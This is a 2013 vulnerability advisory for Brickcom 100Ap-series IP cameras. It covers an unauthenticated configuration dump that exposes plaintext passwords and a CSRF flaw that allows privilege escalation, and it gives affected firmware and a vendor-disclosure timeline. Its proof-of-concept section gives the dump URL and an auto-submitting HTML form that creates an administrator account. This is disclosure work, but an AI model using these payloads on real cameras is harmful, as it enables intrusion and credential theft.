BRICKCOM
1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiples vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)
3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
Its possible others models are affected but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4
-CVE-2013-3690.
All firmware checked.
4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). Its not necessary any authentication.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________
The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***
4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method.
Also is possible a privilege escalation from a viewer user to an administrator user.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
The following request can exploit this vulnerability
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3689 was discovered by Eliezer Varad Lopez, Javier Repiso Snchez and Jons Ropero Castillo.
-CVE-2013-3690 was discovered by Jons Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, its looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)
-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities.
-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible.